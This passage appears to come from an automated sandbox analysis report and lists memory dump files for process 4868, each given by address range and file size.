5.6MB
-
memory/4868-34-0x0000000007180000-0x0000000007216000-memory.dmpFilesize
600KB
-
memory/4868-38-0x0000000008920000-0x000000000CC4F000-memory.dmpFilesize
67.2MB
-
memory/4868-33-0x0000000006480000-0x000000000649A000-memory.dmpFilesize
104KB
-
memory/4868-32-0x0000000007740000-0x0000000007DBA000-memory.dmpFilesize
6.5MB
-
memory/4868-31-0x0000000005F10000-0x0000000005F5C000-memory.dmpFilesize
304KB
-
memory/4868-30-0x0000000005ED0000-0x0000000005EEE000-memory.dmpFilesize
120KB
-
memory/4868-29-0x0000000005A10000-0x0000000005D64000-memory.dmpFilesize
3.3MB
-
memory/4868-19-0x00000000058A0000-0x0000000005906000-memory.dmpFilesize
408KB
-
memory/4868-18-0x0000000005740000-0x00000000057A6000-memory.dmpFilesize
408KB
-
memory/4868-16-0x0000000004FA0000-0x00000000055C8000-memory.dmpFilesize
6.2MB
-
memory/4868-15-0x0000000004930000-0x0000000004966000-memory.dmpFilesize
216KB